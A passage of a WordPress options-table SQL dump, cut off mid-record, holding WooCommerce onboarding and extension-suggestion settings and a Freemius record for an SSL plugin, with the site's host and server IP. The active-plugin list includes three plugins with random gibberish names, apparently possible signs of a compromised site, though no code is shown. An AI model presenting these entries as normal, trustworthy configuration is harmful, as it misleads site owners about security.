(52924,'woocommerce_onboarding_profile','a:9:{s:12:\"setup_client\";b:0;s:8:\"industry\";a:1:{i:0;a:1:{s:4:\"slug\";s:21:\"electronics-computers\";}}s:13:\"product_types\";a:1:{i:0;s:9:\"downloads\";}s:13:\"product_count\";s:4:\"1-10\";s:14:\"selling_venues\";s:2:\"no\";s:19:\"business_extensions\";a:0:{}s:5:\"theme\";s:12:\"twentytwenty\";s:7:\"plugins\";s:7:\"skipped\";s:9:\"completed\";b:1;}','yes'),
(52934,'woocommerce_task_list_tracked_completed_tasks','a:3:{i:0;s:13:\"store_details\";i:1;s:8:\"products\";i:2;s:8:\"payments\";}','yes'),
(52935,'woocommerce_task_list_welcome_modal_dismissed','yes','yes'),
(52941,'woocommerce_marketplace_suggestions','a:2:{s:11:\"suggestions\";a:27:{i:0;a:4:{s:4:\"slug\";s:28:\"product-edit-meta-tab-header\";s:7:\"context\";s:28:\"product-edit-meta-tab-header\";s:5:\"title\";s:22:\"Recommended extensions\";s:13:\"allow-dismiss\";b:0;}i:1;a:6:{s:4:\"slug\";s:39:\"product-edit-meta-tab-footer-browse-all\";s:7:\"context\";s:28:\"product-edit-meta-tab-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:2;a:9:{s:4:\"slug\";s:46:\"product-edit-mailchimp-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-mailchimp\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/mailchimp-for-memberships.svg\";s:5:\"title\";s:25:\"Mailchimp for Memberships\";s:4:\"copy\";s:79:\"Completely automate your email lists by syncing membership changes to Mailchimp\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/mailchimp-woocommerce-memberships/\";}i:3;a:9:{s:4:\"slug\";s:19:\"product-edit-addons\";s:7:\"product\";s:26:\"woocommerce-product-addons\";s:14:\"show-if-active\";a:2:{i:0;s:25:\"woocommerce-subscriptions\";i:1;s:20:\"woocommerce-bookings\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-add-ons.svg\";s:5:\"title\";s:15:\"Product Add-Ons\";s:4:\"copy\";s:93:\"Offer add-ons like gift wrapping, special messages or other special options for your products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-add-ons/\";}i:4;a:9:{s:4:\"slug\";s:46:\"product-edit-woocommerce-subscriptions-gifting\";s:7:\"product\";s:33:\"woocommerce-subscriptions-gifting\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/gifting-for-subscriptions.svg\";s:5:\"title\";s:25:\"Gifting for Subscriptions\";s:4:\"copy\";s:70:\"Let customers buy subscriptions for others - they\'re the ultimate gift\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/woocommerce-subscriptions-gifting/\";}i:5;a:9:{s:4:\"slug\";s:42:\"product-edit-teams-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-for-teams\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:112:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/teams-for-memberships.svg\";s:5:\"title\";s:21:\"Teams for Memberships\";s:4:\"copy\";s:123:\"Adds B2B functionality to WooCommerce Memberships, allowing sites to sell team, group, corporate, or family member accounts\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/teams-woocommerce-memberships/\";}i:6;a:8:{s:4:\"slug\";s:29:\"product-edit-variation-images\";s:7:\"product\";s:39:\"woocommerce-additional-variation-images\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/additional-variation-images.svg\";s:5:\"title\";s:27:\"Additional Variation Images\";s:4:\"copy\";s:72:\"Showcase your products in the best light with a image for each variation\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:73:\"https://woocommerce.com/products/woocommerce-additional-variation-images/\";}i:7;a:9:{s:4:\"slug\";s:47:\"product-edit-woocommerce-subscription-downloads\";s:7:\"product\";s:34:\"woocommerce-subscription-downloads\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:113:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscription-downloads.svg\";s:5:\"title\";s:22:\"Subscription Downloads\";s:4:\"copy\";s:57:\"Give customers special downloads with their subscriptions\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:68:\"https://woocommerce.com/products/woocommerce-subscription-downloads/\";}i:8;a:8:{s:4:\"slug\";s:31:\"product-edit-min-max-quantities\";s:7:\"product\";s:30:\"woocommerce-min-max-quantities\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:109:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/min-max-quantities.svg\";s:5:\"title\";s:18:\"Min/Max Quantities\";s:4:\"copy\";s:81:\"Specify minimum and maximum allowed product quantities for orders to be completed\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/min-max-quantities/\";}i:9;a:8:{s:4:\"slug\";s:28:\"product-edit-name-your-price\";s:7:\"product\";s:27:\"woocommerce-name-your-price\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/name-your-price.svg\";s:5:\"title\";s:15:\"Name Your Price\";s:4:\"copy\";s:70:\"Let customers pay what they want - useful for donations, tips and more\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/name-your-price/\";}i:10;a:8:{s:4:\"slug\";s:42:\"product-edit-woocommerce-one-page-checkout\";s:7:\"product\";s:29:\"woocommerce-one-page-checkout\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/one-page-checkout.svg\";s:5:\"title\";s:17:\"One Page Checkout\";s:4:\"copy\";s:92:\"Don\'t make customers click around - let them choose products, checkout & pay all on one page\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/woocommerce-one-page-checkout/\";}i:11;a:4:{s:4:\"slug\";s:19:\"orders-empty-header\";s:7:\"context\";s:24:\"orders-list-empty-header\";s:5:\"title\";s:20:\"Tools for your store\";s:13:\"allow-dismiss\";b:0;}i:12;a:6:{s:4:\"slug\";s:30:\"orders-empty-footer-browse-all\";s:7:\"context\";s:24:\"orders-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:13;a:8:{s:4:\"slug\";s:19:\"orders-empty-wc-pay\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-payments\";s:4:\"icon\";s:111:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/woocommerce-payments.svg\";s:5:\"title\";s:20:\"WooCommerce Payments\";s:4:\"copy\";s:125:\"Securely accept payments and manage transactions directly from your WooCommerce dashboard – no setup costs or monthly fees.\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-payments/\";}i:14;a:8:{s:4:\"slug\";s:19:\"orders-empty-zapier\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:18:\"woocommerce-zapier\";s:4:\"icon\";s:97:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/zapier.svg\";s:5:\"title\";s:6:\"Zapier\";s:4:\"copy\";s:88:\"Save time and increase productivity by connecting your store to more than 1000+ services\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/woocommerce-zapier/\";}i:15;a:8:{s:4:\"slug\";s:30:\"orders-empty-shipment-tracking\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:29:\"woocommerce-shipment-tracking\";s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipment-tracking.svg\";s:5:\"title\";s:17:\"Shipment Tracking\";s:4:\"copy\";s:86:\"Let customers know when their orders will arrive by adding shipment tracking to emails\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:51:\"https://woocommerce.com/products/shipment-tracking/\";}i:16;a:8:{s:4:\"slug\";s:32:\"orders-empty-table-rate-shipping\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:31:\"woocommerce-table-rate-shipping\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/table-rate-shipping.svg\";s:5:\"title\";s:19:\"Table Rate Shipping\";s:4:\"copy\";s:122:\"Advanced, flexible shipping. Define multiple shipping rates based on location, price, weight, shipping class or item count\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/table-rate-shipping/\";}i:17;a:8:{s:4:\"slug\";s:40:\"orders-empty-shipping-carrier-extensions\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipping-carrier-extensions.svg\";s:5:\"title\";s:27:\"Shipping Carrier Extensions\";s:4:\"copy\";s:116:\"Show live rates from FedEx, UPS, USPS and more directly on your store - never under or overcharge for shipping again\";s:11:\"button-text\";s:13:\"Find Carriers\";s:8:\"promoted\";s:26:\"category-shipping-carriers\";s:3:\"url\";s:99:\"https://woocommerce.com/product-category/woocommerce-extensions/shipping-methods/shipping-carriers/\";}i:18;a:8:{s:4:\"slug\";s:32:\"orders-empty-google-product-feed\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-product-feeds\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/google-product-feed.svg\";s:5:\"title\";s:19:\"Google Product Feed\";s:4:\"copy\";s:76:\"Increase sales by letting customers find you when they\'re shopping on Google\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/google-product-feed/\";}i:19;a:4:{s:4:\"slug\";s:35:\"products-empty-header-product-types\";s:7:\"context\";s:26:\"products-list-empty-header\";s:5:\"title\";s:23:\"Other types of products\";s:13:\"allow-dismiss\";b:0;}i:20;a:6:{s:4:\"slug\";s:32:\"products-empty-footer-browse-all\";s:7:\"context\";s:26:\"products-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:21;a:8:{s:4:\"slug\";s:30:\"products-empty-product-vendors\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-vendors\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-vendors.svg\";s:5:\"title\";s:15:\"Product Vendors\";s:4:\"copy\";s:47:\"Turn your store into a multi-vendor marketplace\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-vendors/\";}i:22;a:8:{s:4:\"slug\";s:26:\"products-empty-memberships\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:23:\"woocommerce-memberships\";s:4:\"icon\";s:102:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/memberships.svg\";s:5:\"title\";s:11:\"Memberships\";s:4:\"copy\";s:76:\"Give members access to restricted content or products, for a fee or for free\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:57:\"https://woocommerce.com/products/woocommerce-memberships/\";}i:23;a:9:{s:4:\"slug\";s:35:\"products-empty-woocommerce-deposits\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-deposits\";s:14:\"show-if-active\";a:1:{i:0;s:20:\"woocommerce-bookings\";}s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/deposits.svg\";s:5:\"title\";s:8:\"Deposits\";s:4:\"copy\";s:75:\"Make it easier for customers to pay by offering a deposit or a payment plan\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-deposits/\";}i:24;a:8:{s:4:\"slug\";s:40:\"products-empty-woocommerce-subscriptions\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-subscriptions\";s:4:\"icon\";s:104:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:13:\"Subscriptions\";s:4:\"copy\";s:97:\"Let customers subscribe to your products or services and pay on a weekly, monthly or annual basis\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:59:\"https://woocommerce.com/products/woocommerce-subscriptions/\";}i:25;a:8:{s:4:\"slug\";s:35:\"products-empty-woocommerce-bookings\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-bookings\";s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/bookings.svg\";s:5:\"title\";s:8:\"Bookings\";s:4:\"copy\";s:99:\"Allow customers to book appointments, make reservations or rent equipment without leaving your site\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-bookings/\";}i:26;a:8:{s:4:\"slug\";s:30:\"products-empty-product-bundles\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-bundles\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-bundles.svg\";s:5:\"title\";s:15:\"Product Bundles\";s:4:\"copy\";s:49:\"Offer customizable bundles and assembled products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-bundles/\";}}s:7:\"updated\";i:1645209135;}','no'),
(52946,'_transient_product_query-transient-version','1670062115','yes'),
(52947,'_transient_product-transient-version','1608981923','yes'),
(52961,'_transient_shipping-transient-version','1608981955','yes'),
(53194,'auto_update_core_dev','enabled','yes'),
(53195,'auto_update_core_minor','enabled','yes'),
(53196,'auto_update_core_major','unset','yes'),
(53218,'_transient_orders-transient-version','1645253685','yes'),
(53241,'woocommerce_admin_last_orders_milestone','1','yes'),
(53570,'woocommerce_sales_record_date','2022-02-19','yes'),
(53571,'woocommerce_sales_record_amount','4000','yes'),
(67364,'_transient_jetpack_autoloader_plugin_paths','a:0:{}','yes'),
(96345,'woocommerce_merchant_email_notifications','no','no'),
(96354,'wfls_last_role_change','1720851063','no'),
(96787,'https_detection_errors','a:0:{}','off'),
(100710,'wc_remote_inbox_notifications_wca_updated','','no'),
(100723,'fs_active_plugins','O:8:\"stdClass\":0:{}','yes'),
(100724,'fs_debug_mode','','yes'),
(100725,'fs_accounts','a:15:{s:21:\"id_slug_type_path_map\";a:1:{i:5090;a:3:{s:4:\"slug\";s:18:\"wp-letsencrypt-ssl\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:37:\"wp-letsencrypt-ssl/wp-letsencrypt.php\";}}s:11:\"plugin_data\";a:1:{s:18:\"wp-letsencrypt-ssl\";a:24:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:37:\"wp-letsencrypt-ssl/wp-letsencrypt.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1621499293;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.5\";s:11:\"sdk_version\";s:5:\"2.5.3\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"5.9.4\";s:14:\"plugin_version\";s:6:\"5.11.3\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:10:\"ictbank.ir\";s:9:\"server_ip\";s:13:\"79.127.96.129\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1621499293;s:7:\"version\";s:5:\"5.4.2\";}s:15:\"prev_is_premium\";b:0;s:30:\"is_extensions_tracking_allowed\";b:1;s:14:\"has_trial_plan\";b:0;s:22:\"install_sync_timestamp\";i:1680116539;s:19:\"keepalive_timestamp\";i:1680116539;s:20:\"activation_timestamp\";i:1621499425;s:14:\"sync_timestamp\";i:1680115774;s:15:\"is_whitelabeled\";b:0;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"5.4.1\";}s:30:\"affiliate_program_notice_shown\";i:1624284646;}}s:13:\"file_slug_map\";a:1:{s:37:\"wp-letsencrypt-ssl/wp-letsencrypt.php\";s:18:\"wp-letsencrypt-ssl\";}s:7:\"plugins\";a:1:{s:18:\"wp-letsencrypt-ssl\";O:9:\"FS_Plugin\":23:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:43:\"WP Encryption - One Click SSL & Force HTTPS\";s:4:\"slug\";s:18:\"wp-letsencrypt-ssl\";s:12:\"premium_slug\";s:22:\"wp-letsencrypt-ssl-pro\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";s:3:\"all\";s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:37:\"wp-letsencrypt-ssl/wp-letsencrypt.php\";s:7:\"version\";s:6:\"5.11.3\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:10:\"public_key\";s:32:\"pk_f6a07c106bf4ef064d9ac4b989e02\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5090\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"f589d99e77a9180e56880e0aa04434e2\";s:5:\"plans\";a:1:{s:18:\"wp-letsencrypt-ssl\";a:5:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"NTA5MA==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";s:76:\"aHR0cHM6Ly93b3JkcHJlc3Mub3JnL3N1cHBvcnQvcGx1Z2luL3dwLWxldHNlbmNyeXB0LXNzbC8=\";s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"ODIwOQ==\";s:7:\"updated\";s:28:\"MjAyMC0wNy0wOSAxNjozNDoxMQ==\";s:7:\"created\";s:28:\"MjAxOS0xMS0zMCAxNjoyNDowMw==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:1;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"NTA5MA==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UFJP\";s:11:\"description\";s:0:\"\";s:17:\"is_free_localhost\";s:0:\"\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:32:\"aHR0cHM6Ly93cGVuY3J5cHRpb24uY29t\";s:13:\"support_forum\";s:32:\"aHR0cHM6Ly9nb3dlYnNtYXJ0eS5pbg==\";s:13:\"support_email\";s:32:\"c3VwcG9ydEB3cGVuY3J5cHRpb24uY29t\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"ODIxMA==\";s:7:\"updated\";s:28:\"MjAyMi0xMS0zMCAxMjo0NTowNA==\";s:7:\"created\";s:28:\"MjAxOS0xMS0zMCAxNjoyOToxMQ==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:2;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"NTA5MA==\";s:4:\"name\";s:12:\"ZmlyZXdhbGw=\";s:5:\"title\";s:4:\"Q0RO\";s:11:\"description\";s:28:\"U1NMICsgQ0ROICsgRklSRVdBTEw=\";s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:52:\"aHR0cHM6Ly93cGVuY3J5cHRpb24uY29tL2Nkbi1maXJld2FsbC8=\";s:13:\"support_forum\";s:32:\"aHR0cHM6Ly93cGVuY3J5cHRpb24uY29t\";s:13:\"support_email\";s:36:\"ZmlyZXdhbGxAd3BlbmNyeXB0aW9uLmNvbQ==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"MTA2NDM=\";s:7:\"updated\";s:28:\"MjAyMy0wMy0xOSAxMToxNTo0Mg==\";s:7:\"created\";s:28:\"MjAyMC0wNy0wOSAxNzo1NTo1Nw==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"NTA5MA==\";s:4:\"name\";s:16:\"YW5udWFsX29ubHk=\";s:5:\"title\";s:12:\"UFJPIC0gR0RZ\";s:11:\"description\";s:12:\"U1NMICsgQ0RO\";s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:32:\"aHR0cHM6Ly93cGVuY3J5cHRpb24uY29t\";s:13:\"support_forum\";s:32:\"aHR0cHM6Ly9nb3dlYnNtYXJ0eS5pbg==\";s:13:\"support_email\";s:32:\"c3VwcG9ydEB3cGVuY3J5cHRpb24uY29t\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"MTEzOTQ=\";s:7:\"updated\";s:28:\"MjAyMS0xMC0xMSAxNDo1MzowNA==\";s:7:\"created\";s:28:\"MjAyMC0xMC0wMiAxNjozODoyNw==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:4;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"NTA5MA==\";s:4:\"name\";s:12:\"c2l0ZWxvY2s=\";s:5:\"title\";s:12:\"U0lURUxPQ0s=\";s:11:\"description\";s:32:\"UFJPICsgU0lURUxPQ0sgTU9OSVRPUg==\";s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:32:\"aHR0cHM6Ly93cGVuY3J5cHRpb24uY29t\";s:13:\"support_forum\";s:32:\"aHR0cHM6Ly9nb3dlYnNtYXJ0eS5pbg==\";s:13:\"support_email\";s:32:\"c3VwcG9ydEB3cGVuY3J5cHRpb24uY29t\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"MjA3ODQ=\";s:7:\"updated\";s:28:\"MjAyMy0wMy0yOCAwMjo0NDoyNg==\";s:7:\"created\";s:28:\"MjAyMy0wMy0xOCAxMDo1NzoxNQ==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}s:14:\"active_plugins\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1680116520;s:3:\"md5\";s:32:\"46c1ed64cab7891c88dc903f109d1dab\";s:7:\"plugins\";a:11:{s:39:\"syntaxhighlighter/syntaxhighlighter.php\";a:5:{s:4:\"slug\";s:17:\"syntaxhighlighter\";s:7:\"version\";s:5:\"3.6.0\";s:5:\"title\";s:25:\"SyntaxHighlighter Evolved\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:23:\"wordfence/wordfence.php\";a:5:{s:4:\"slug\";s:9:\"wordfence\";s:7:\"version\";s:5:\"7.5.3\";s:5:\"title\";s:18:\"Wordfence Security\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:37:\"wp-letsencrypt-ssl/wp-letsencrypt.php\";a:5:{s:4:\"slug\";s:18:\"wp-letsencrypt-ssl\";s:7:\"version\";s:5:\"5.4.2\";s:5:\"title\";s:43:\"WP Encryption - One Click SSL & Force HTTPS\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:31:\"wp-statistics/wp-statistics.php\";a:5:{s:4:\"slug\";s:13:\"wp-statistics\";s:7:\"version\";s:6:\"13.0.8\";s:5:\"title\";s:13:\"WP Statistics\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:23:\"elementor/elementor.php\";a:5:{s:4:\"slug\";s:9:\"elementor\";s:7:\"version\";s:5:\"3.2.3\";s:5:\"title\";s:9:\"Elementor\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:33:\"auxin-elements/auxin-elements.php\";a:5:{s:4:\"slug\";s:14:\"auxin-elements\";s:7:\"version\";s:6:\"2.7.13\";s:5:\"title\";s:19:\"Phlox Core Elements\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:59:\"disable-remove-google-fonts/disable-remove-google-fonts.php\";a:5:{s:4:\"slug\";s:27:\"disable-remove-google-fonts\";s:7:\"version\";s:5:\"1.5.2\";s:5:\"title\";s:29:\"Disable & Remove Google Fonts\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:31:\"elementor-pro/elementor-pro.php\";a:5:{s:4:\"slug\";s:13:\"elementor-pro\";s:7:\"version\";s:5:\"3.5.1\";s:5:\"title\";s:13:\"Elementor Pro\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:27:\"lywajybybyp/lywajybybyp.php\";a:5:{s:4:\"slug\";s:11:\"lywajybybyp\";s:7:\"version\";s:5:\"1.1.8\";s:5:\"title\";s:11:\"Lywajybybyp\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:21:\"kyvomyco/kyvomyco.php\";a:5:{s:4:\"slug\";s:8:\"kyvomyco\";s:7:\"version\";s:0:\"\";s:5:\"title\";s:17:\"vabagawakhypimoza\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:23:\"gabotyqoj/gabotyqoj.php\";a:5:{s:4:\"slug\";s:9:\"gabotyqoj\";s:7:\"version\";s:6:\"1.12.3\";s:5:\"title\";s:9:\"Gabotyqoj\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}}}s:11:\"all_plugins\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1680116520;s:3:\"md5\";s:32:\"61379b2f5223592d77873ecb0f172401\";s:7:\"plugins\";a:11:{s:39:\"syntaxhighlighter/syntaxhighlighter.php\";a:6:{s:4:\"slug\";s:17:\"syntaxhighlighter\";s:7:\"version\";s:5:\"3.6.0\";s:5:\"title\";s:25:\"SyntaxHighlighter 